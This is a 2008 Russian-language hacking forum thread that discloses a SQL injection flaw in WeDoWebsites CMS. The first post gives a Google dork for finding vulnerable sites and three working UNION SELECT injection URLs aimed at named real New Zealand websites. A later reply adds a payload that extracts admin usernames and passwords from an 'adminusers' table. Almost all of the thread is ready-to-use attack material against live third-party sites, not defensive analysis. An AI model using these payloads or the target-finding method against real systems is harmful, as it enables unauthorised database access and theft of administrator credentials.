ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Сценарии/CMF/СMS
Перезагрузить страницу WeDoWebsites CMS Remote SQL Injection Vulnerability
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

WeDoWebsites CMS Remote SQL Injection Vulnerability
  #1  
Старый 04.01.2008, 08:33
Аватар для Ded MustD!e
Ded MustD!e
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
Провел на форуме:
14324684

Репутация: 3908
По умолчанию WeDoWebsites CMS Remote SQL Injection Vulnerability
*******************WeDoWebsites Content Management System*******************

AUTHOR: Ded MustD!e
GOOGLE DORK: "Powered by a WeDoWebsites Content Management System"
LINK: http://www.wedowebsites.co.nz/
EXPLOIT: http://site.com/xxxxx.php?pid=[SQL-INJ]
DETAILS: колонок 6, а вот таблицу с данными админа я подобрать так и не смог, хотя префикс вроде не используется; админка: http://site.com/admin/
EXAMPLES:

Код:
http://www.whiteelephant.co.nz/abeltasmanbackpackers.php?pid=-1+union+select+1,2,3,4,conca   t_ws(0x3a,user(),version(),database()),6/*
Код:
http://www.vistadesign.co.nz/landscapedesigners.php?pid=-1+union+select+1,2,concat_ws(0x3a,   user(),version(),database()),4,5,6/*
Код:
http://www.villaonthebay.co.nz/holidayhomegallery.php?pid=-1+union+select+1,2,3,4,concat_ws(   0x3a,user(),version(),database()),6/*
P.S. А вообще в гугле 5 страниц с примерами . Если кто-нибудь подберет таблицу, напишите сюда или мне в ПМ, буду благодарен.

************************************************** *************************
 
Ответить с цитированием

  #2  
Старый 04.01.2008, 20:11
Аватар для Piflit
Piflit
Banned
Регистрация: 11.08.2006
Сообщений: 1,522
Провел на форуме:
5128756

Репутация: 2032


Отправить сообщение для Piflit с помощью ICQ
По умолчанию
у меня выводится 11 полей =)
кмс платная что ли? в чем проблема узнать, какие там таблицы?
 
Ответить с цитированием

  #3  
Старый 05.01.2008, 15:29
Аватар для Ded MustD!e
Ded MustD!e
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
Провел на форуме:
14324684

Репутация: 3908
По умолчанию
по-видимому да, я так и не нашел, где слить исходники
 
Ответить с цитированием

  #4  
Старый 05.01.2008, 17:41
Аватар для Nea7
Nea7
Участник форума
Регистрация: 08.09.2007
Сообщений: 211
Провел на форуме:
5076186

Репутация: 778
По умолчанию
Код:
-1+union+select+1,2,3,4,concat_ws(0x3a,usr,pwd),6+from+adminusers+limit+0,1/*
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection для чайников, взлом ASP+MSSQL k00p3r Чужие Статьи 0 12.06.2005 12:42
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ